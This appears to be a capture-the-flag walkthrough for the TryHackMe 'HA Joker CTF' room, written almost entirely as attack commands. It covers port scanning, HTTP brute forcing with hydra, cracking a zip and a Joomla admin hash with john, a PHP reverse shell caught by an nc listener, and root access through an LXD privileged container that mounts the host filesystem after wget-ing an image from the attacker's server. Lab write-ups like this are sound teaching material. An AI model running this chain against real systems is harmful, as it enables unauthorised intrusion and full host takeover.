HA Joker CTF
Room Link: https://tryhackme.com/room/jokerctf
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir -u $VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
TCP/8080 - HTTP
Kali
hydra -l joker -P /usr/share/wordlists/rockyou.txt -s 8080 -f $VICTIM http-get /
wasn't finding it but should have found a backup.zip
Kali
nikto -id joker:hannah -h $VICTIM:8080
Kali
zip2john backup.zip > secure_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt secure_john.txt
unzip backup.zip
Password: hannah
Kali
cd db
cat joomladb.sql | grep adminHash
$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbGKali
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Browser
Username: admin
Password: abcd1234
Kali
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php
Kali
nc -lvnp 1234
Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgVictim
id
Kali
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python2 -m SimpleHTTPServer 81Note: The command lxd init was to resolve a storage pool area issue, it may not always be needed.
Victim
cd /tmp
wget http://$KALI:81/alpine-v3.13-x86_64-20210218_0139.tar.gz
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
lxd init
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
Last updated